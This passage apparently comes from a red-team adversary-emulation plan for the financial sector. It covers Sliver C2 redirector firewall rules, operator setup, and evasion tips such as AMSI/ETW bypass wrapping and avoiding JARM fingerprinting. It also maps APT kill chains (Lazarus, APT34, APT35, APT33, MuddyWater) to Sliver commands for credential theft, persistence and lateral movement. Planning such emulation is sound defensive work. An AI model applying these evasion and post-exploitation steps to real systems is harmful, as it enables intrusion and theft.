&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;iptables&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; -A&lt;&#x2F;span&gt;&lt;span&gt; INPUT&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; -p&lt;&#x2F;span&gt;&lt;span&gt; tcp&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --dport 443 -s&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;redirector-ip&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; -j&lt;&#x2F;span&gt;&lt;span&gt; ACCEPT&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;iptables&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; -A&lt;&#x2F;span&gt;&lt;span&gt; INPUT&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; -p&lt;&#x2F;span&gt;&lt;span&gt; tcp&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --dport 443 -j&lt;&#x2F;span&gt;&lt;span&gt; DROP&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;operational-notes&quot;&gt;Operational Notes&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;Default Sliver HTTPS listeners use a recognizable certificate chain (US cities + &quot;CN = localhost&quot;) and produce a characteristic 400 error on malformed requests — operators must replace with custom certificates and configure domain fronting via Cloudflare or CDN to avoid JARM fingerprinting.&lt;&#x2F;li&gt;
&lt;li&gt;Use &lt;code&gt;Donut&lt;&#x2F;code&gt; or &lt;code&gt;Scarecrow&lt;&#x2F;code&gt; to wrap Sliver shellcode output with AMSI&#x2F;ETW bypass before deployment.&lt;&#x2F;li&gt;
&lt;li&gt;Sliver supports Windows process migration, process injection, and user token manipulation natively — use these for post-exploitation rather than external tools where possible to reduce tooling footprint.&lt;&#x2F;li&gt;
&lt;li&gt;Armory package manager provides integrated BOF extensions: &lt;code&gt;armory install sa-ldapsearch&lt;&#x2F;code&gt; for AD enumeration without dropping SharpHound to disk.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;multiplayer-operator-configuration&quot;&gt;Multiplayer Operator Configuration&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# On team server — generate per-operator configs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver-server&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --name&lt;&#x2F;span&gt;&lt;span&gt; operator1&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --lhost&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;team_server_ip&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# On operator machine — import and connect&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver-client&lt;&#x2F;span&gt;&lt;span&gt; import operator1.cfg&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver-client&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-4-threat-actor-emulation-apts-kill-chains-2023-2025&quot;&gt;Phase 4 — Threat Actor Emulation: APTs &amp;amp; Kill Chains (2023–2025)&lt;&#x2F;h2&gt;
&lt;p&gt;All scenarios are driven by the Threat Intelligence Report and mapped to &lt;strong&gt;MITRE ATT&amp;amp;CK for Enterprise v16.1&lt;&#x2F;strong&gt; and &lt;strong&gt;NIST 800-53 Rev. 5&lt;&#x2F;strong&gt; control families.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-1-lazarus-group-apt38-tradertraitor-dprk&quot;&gt;APT 1 — Lazarus Group &#x2F; APT38 &#x2F; TraderTraitor (DPRK)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: Critical | MITRE: G0032 &#x2F; G0082 | Sponsor: Reconnaissance General Bureau&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide, with significant operations including the 2016 Bank of Bangladesh heist ($81 million stolen).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2024–2025 Activity:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;In February 2025, a Lazarus subgroup created a counterfeit wallet management interface, deceiving Bybit executives into authorizing the transfer of over 400,000 ETH from cold storage — the largest crypto heist in history at $1.5 billion.&lt;&#x2F;li&gt;
&lt;li&gt;In 2024, Lazarus exploited CVE-2024-38193 (Windows AFD.sys zero-day) for SYSTEM-level access and CVE-2024-21338 (Windows kernel flaw, CVSS 7.8) for privilege escalation.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Reconnaissance&lt;&#x2F;td&gt;&lt;td&gt;Fake LinkedIn recruiter profiles (&quot;Operation Dream Job&quot;)&lt;&#x2F;td&gt;&lt;td&gt;T1591.004, T1598&lt;&#x2F;td&gt;&lt;td&gt;OSINT &#x2F; Gophish persona&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Trojanized job offer docs; watering-hole on financial portals&lt;&#x2F;td&gt;&lt;td&gt;T1566.001, T1189&lt;&#x2F;td&gt;&lt;td&gt;Sliver HTTPS beacon in weaponized doc&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;DLL sideloading via malicious macro chain&lt;&#x2F;td&gt;&lt;td&gt;T1055.001&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;sideload&lt;&#x2F;code&gt; module&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Registry run keys; scheduled tasks&lt;&#x2F;td&gt;&lt;td&gt;T1547.001, T1053.005&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;registry write&lt;&#x2F;code&gt;; &lt;code&gt;task-scheduler&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Privilege Escalation&lt;&#x2F;td&gt;&lt;td&gt;CVE-2024-38193 &#x2F; CVE-2024-21338 BYOVD&lt;&#x2F;td&gt;&lt;td&gt;T1068&lt;&#x2F;td&gt;&lt;td&gt;BYOVD harness + Sliver token manipulation&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;BYOVD; anti-forensic wipers post-exfil&lt;&#x2F;td&gt;&lt;td&gt;T1014, T1561.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt; + custom wiper&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Credential Access&lt;&#x2F;td&gt;&lt;td&gt;KiloAlfa keylogger; &lt;code&gt;CreateProcessAsUserA&lt;&#x2F;code&gt; token theft&lt;&#x2F;td&gt;&lt;td&gt;T1056.001, T1134.002&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;token steal&lt;&#x2F;code&gt;; &lt;code&gt;execute-assembly Seatbelt&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Pass-the-hash; LOLBins&lt;&#x2F;td&gt;&lt;td&gt;T1550.002, T1218&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;psexec&lt;&#x2F;code&gt;; &lt;code&gt;wmiexec&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Impact&lt;&#x2F;td&gt;&lt;td&gt;Fraudulent SWIFT MT103 staging; cold wallet UI spoofing&lt;&#x2F;td&gt;&lt;td&gt;T1657, T1041&lt;&#x2F;td&gt;&lt;td&gt;Sliver WireGuard tunnel to SWIFT endpoint&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; AC-2, AC-17, SI-3, SI-4, AU-12, IR-4, SC-7&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-2-apt34-oilrig-hazel-sandstorm-iran-mois-irgc-linked&quot;&gt;APT 2 — APT34 &#x2F; OilRig &#x2F; Hazel Sandstorm (Iran — MOIS &#x2F; IRGC-linked)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: Critical | MITRE: G0049 | Sponsor: Iranian Ministry of Intelligence&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;OilRig (APT34) primarily conducts cyber espionage targeting government entities, financial services, telecommunications, defense contractors, and energy organizations, particularly in the Middle East. The group commonly relies on spear-phishing campaigns, credential harvesting, and exploitation of internet-facing applications for initial access, followed by custom backdoors and web shells to maintain persistence.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2024–2025 Activity:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Beginning in September 2024, APT34 intensified operations through a multi-stage intrusion campaign deploying novel malware families including the Veaty and Spearal backdoors. By late 2024 and into early 2025, a renewed campaign introduced C# malware masquerading as PDF documents, incorporating anti-VM checks, timestamp manipulation, and dual C2 channels combining HTTP through European servers hidden behind fake 404 error pages with email-based control using compromised government accounts — commands concealed within Authorization Bearer tokens.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Reconnaissance&lt;&#x2F;td&gt;&lt;td&gt;Target research on financial employees; infrastructure enumeration&lt;&#x2F;td&gt;&lt;td&gt;T1591, T1590&lt;&#x2F;td&gt;&lt;td&gt;OSINT + Nuclei external scan&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Spear-phishing with malicious PDF&#x2F;C# payload masquerading as regulatory document&lt;&#x2F;td&gt;&lt;td&gt;T1566.001&lt;&#x2F;td&gt;&lt;td&gt;Sliver beacon embedded in lure PDF&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;PowerShell download cradle; macro execution&lt;&#x2F;td&gt;&lt;td&gt;T1059.001&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute -o powershell&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Web shells (HyperShell, HighShell); scheduled tasks&lt;&#x2F;td&gt;&lt;td&gt;T1505.003, T1053&lt;&#x2F;td&gt;&lt;td&gt;Sliver HTTP reverse shell + &lt;code&gt;task-scheduler&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;Command obfuscation; fake 404 C2 pages; Bearer token C2 exfil&lt;&#x2F;td&gt;&lt;td&gt;T1027, T1001.003&lt;&#x2F;td&gt;&lt;td&gt;Custom Sliver HTTP profile with 404 responses&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Credential Access&lt;&#x2F;td&gt;&lt;td&gt;Mimikatz; LaZagne; credential-filter DLLs&lt;&#x2F;td&gt;&lt;td&gt;T1003, T1555&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;sideload mimikatz.dll&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Cloud service abuse (OneDrive&#x2F;Exchange Online as C2)&lt;&#x2F;td&gt;&lt;td&gt;T1567, T1114.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver pivot + cloud enumeration&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Exfiltration&lt;&#x2F;td&gt;&lt;td&gt;Long-term credential&#x2F;data exfil to cloud storage&lt;&#x2F;td&gt;&lt;td&gt;T1567.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver WireGuard tunnel&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;Notable CVEs for Scenario Use:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2024-30088 (Windows Kernel privilege escalation, exploited by APT34)&lt;&#x2F;li&gt;
&lt;li&gt;CVE-2017-11882 (Office Equation Editor, still weaponized in lure docs)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; SI-3, SI-4, AC-17, IA-5, AU-12, SC-28&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-3-apt35-charming-kitten-mint-sandstorm-iran-irgc&quot;&gt;APT 3 — APT35 &#x2F; Charming Kitten &#x2F; Mint Sandstorm (Iran — IRGC)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | MITRE: G0059 | Sponsor: Islamic Revolutionary Guard Corps&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;CloudSEK analyzed a credible leak of Charming Kitten operational materials documenting coordinated teams for penetration, malware development, social engineering, and infrastructure compromise, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation. Victims include government, legal, academic, aviation, energy, and financial sectors across the Middle East, with regions of interest including the US and Asia.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2024–2025 Activity:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;APT35 sustained a continuous, technically evolving campaign of cyber espionage from late 2024 through 2025, beginning with BellaCPP — a C++ reimplementation of the BellaCiao .NET implant — alongside the PowerLess backdoor updated to version 3.3.4 with AMSI and ETW bypass techniques, AES-encrypted payloads via malicious LNK files, and Telegram-based command-and-control communication.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Spear-phishing with password-protected RAR containing malicious LNK; AI-generated decoy PDFs&lt;&#x2F;td&gt;&lt;td&gt;T1566.001, T1204.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver staged payload in LNK file&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;PowerLess backdoor (PowerShell + AMSI bypass); BellaCPP C++ implant&lt;&#x2F;td&gt;&lt;td&gt;T1059.001&lt;&#x2F;td&gt;&lt;td&gt;Sliver shellcode wrapped with Scarecrow AMSI bypass&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Winlogon registry modification&lt;&#x2F;td&gt;&lt;td&gt;T1547.004&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;registry write HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Credential Access&lt;&#x2F;td&gt;&lt;td&gt;Custom Chromium-based credential stealer (Chrome, Edge, Brave, Opera)&lt;&#x2F;td&gt;&lt;td&gt;T1555.003&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt; + custom stealer BOF&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;EDR evasion via C++ re-implementation; supply chain pivots&lt;&#x2F;td&gt;&lt;td&gt;T1027, T1195&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;--evasion&lt;&#x2F;code&gt; flag + custom shellcode loader&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;C2&lt;&#x2F;td&gt;&lt;td&gt;Telegram API; Dropbox; Google Drive; Backblaze; IPFS&lt;&#x2F;td&gt;&lt;td&gt;T1102, T1567&lt;&#x2F;td&gt;&lt;td&gt;Sliver DNS beacon as fallback to cloud C2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;AD domination; supply-chain pivots via compromised IT providers&lt;&#x2F;td&gt;&lt;td&gt;T1484, T1195.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;psexec&lt;&#x2F;code&gt;; BloodHound path exploitation&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; SI-3, SI-4, IA-2, IA-5, SC-7, AC-3&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-4-apt33-refined-kitten-peach-sandstorm-iran-irgc-linked&quot;&gt;APT 4 — APT33 &#x2F; Refined Kitten &#x2F; Peach Sandstorm (Iran — IRGC-linked)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | MITRE: G0064 | Focus: Financial infrastructure disruption&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Password spraying has become APT33&#x27;s primary initial access method since 2023, targeting Microsoft 365 and Entra ID at scale using go-http-client through TOR exit nodes. The group has expanded beyond traditional espionage to focus on satellite communications and critical infrastructure.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Large-scale M365&#x2F;Entra ID password spraying via TOR&lt;&#x2F;td&gt;&lt;td&gt;T1110.003&lt;&#x2F;td&gt;&lt;td&gt;External spray tool + Sliver beacon on success&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Azure infrastructure abuse; legitimate admin tool persistence&lt;&#x2F;td&gt;&lt;td&gt;T1078.004&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;AADInternals&lt;&#x2F;code&gt; device enrollment + Sliver implant&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Cloud tenant pivoting; service principal abuse&lt;&#x2F;td&gt;&lt;td&gt;T1538, T1098.001&lt;&#x2F;td&gt;&lt;td&gt;ROADtools + Sliver HTTPS beacon&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Impact&lt;&#x2F;td&gt;&lt;td&gt;Pre-positioned access for destructive wiper deployment&lt;&#x2F;td&gt;&lt;td&gt;T1485&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt; wiper simulation&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-5-muddywater-mango-sandstorm-ta450-seedworm-iran-mois&quot;&gt;APT 5 — MuddyWater &#x2F; Mango Sandstorm &#x2F; TA450 &#x2F; Seedworm (Iran — MOIS)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: Critical | MITRE: G0069 | Sponsor: Iranian Ministry of Intelligence and Security (MOIS)&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran&#x27;s Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors including telecommunications, local government, defense, oil and natural gas, and financial organizations in the Middle East, Asia, Africa, Europe, and North America.&lt;&#x2F;p&gt;
&lt;p&gt;CISA has stated MuddyWater actors are &quot;positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors&quot; — making this group particularly dangerous as both a direct threat and an &lt;strong&gt;access broker&lt;&#x2F;strong&gt; feeding other IRGC-affiliated groups such as Storm-1084&#x2F;DarkBit.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2024–2025 Activity Directly Relevant to Financial Sector:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A sophisticated spear-phishing campaign attributed to MuddyWater actively compromised CFOs and finance executives across Europe, North America, South America, Africa, and Asia. The attackers impersonated recruiters from Rothschild &amp;amp; Co, deploying Firebase-hosted phishing pages with custom CAPTCHA challenges to lend legitimacy. Payloads abused legitimate remote-access tools including NetBird and OpenSSH to establish persistent RDP access and automated scheduled tasks.&lt;&#x2F;li&gt;
&lt;li&gt;Symantec&#x2F;Carbon Black flagged suspicious MuddyWater-linked activity on the networks of a U.S. bank, a software company, an airport, and NGOs in the U.S. and Canada — the single most significant indicator of MuddyWater financial sector penetration in the 2024–2026 window.&lt;&#x2F;li&gt;
&lt;li&gt;BugSleep, a new tailor-made backdoor deployed in MuddyWater phishing lures since May 2024, has partially replaced legitimate RMM tools. Multiple versions were distributed in rapid succession showing active development; the backdoor begins with multiple Sleep API calls to evade sandboxes, creates a mutex, decrypts its C2 configuration, and executes threat actor commands while transferring files between the compromised machine and C2.&lt;&#x2F;li&gt;
&lt;li&gt;MuddyWater adopted DarkBeatC2 — a previously unreported C2 framework identified in early 2024 — built on PowerShell with Tactical RMM and Atera Agent abuse. The framework manages infected endpoints via PowerShell connections established after initial access through spear-phishing, DLL sideloading, or Windows Registry AutodialDLL abuse.&lt;&#x2F;li&gt;
&lt;li&gt;MuddyWater deployed Mimikatz via a custom loader and injector in a 2024 campaign, after which the group may have handed off harvested credentials to Lyceum (another Iran-aligned group), with researchers noting MuddyWater may be acting as an access broker for other Iran-aligned threat actors.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;C2 Framework Evolution (2017 → 2025):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Year&lt;&#x2F;th&gt;&lt;th&gt;Framework&lt;&#x2F;th&gt;&lt;th&gt;Notes&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2017–2020&lt;&#x2F;td&gt;&lt;td&gt;POWERSTATS&lt;&#x2F;td&gt;&lt;td&gt;PowerShell-based signature backdoor&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2020–2023&lt;&#x2F;td&gt;&lt;td&gt;RMM Abuse (Atera, ScreenConnect, SimpleHelp, N-able)&lt;&#x2F;td&gt;&lt;td&gt;Legitimate tools to blend with enterprise traffic&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2023&lt;&#x2F;td&gt;&lt;td&gt;PhonyC2 → MuddyC2Go&lt;&#x2F;td&gt;&lt;td&gt;Python → Golang C2 evolution&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Early 2024&lt;&#x2F;td&gt;&lt;td&gt;DarkBeatC2&lt;&#x2F;td&gt;&lt;td&gt;PowerShell-based; Registry AutodialDLL sideloading&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;May 2024–Present&lt;&#x2F;td&gt;&lt;td&gt;BugSleep &#x2F; RustyWater&lt;&#x2F;td&gt;&lt;td&gt;Custom C backdoor; RustyWater is a Rust-based RAT deployed in early 2026 targeting Israeli government, military, financial, telecommunications, and maritime organizations&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain (MITRE ATT&amp;amp;CK Mapped):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Reconnaissance&lt;&#x2F;td&gt;&lt;td&gt;Sector-specific OSINT; identify CFOs, finance executives, IT contacts at target exchange&lt;&#x2F;td&gt;&lt;td&gt;T1591.004, T1589.002&lt;&#x2F;td&gt;&lt;td&gt;OSINT via theHarvester, LinkedIn, FOCA&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
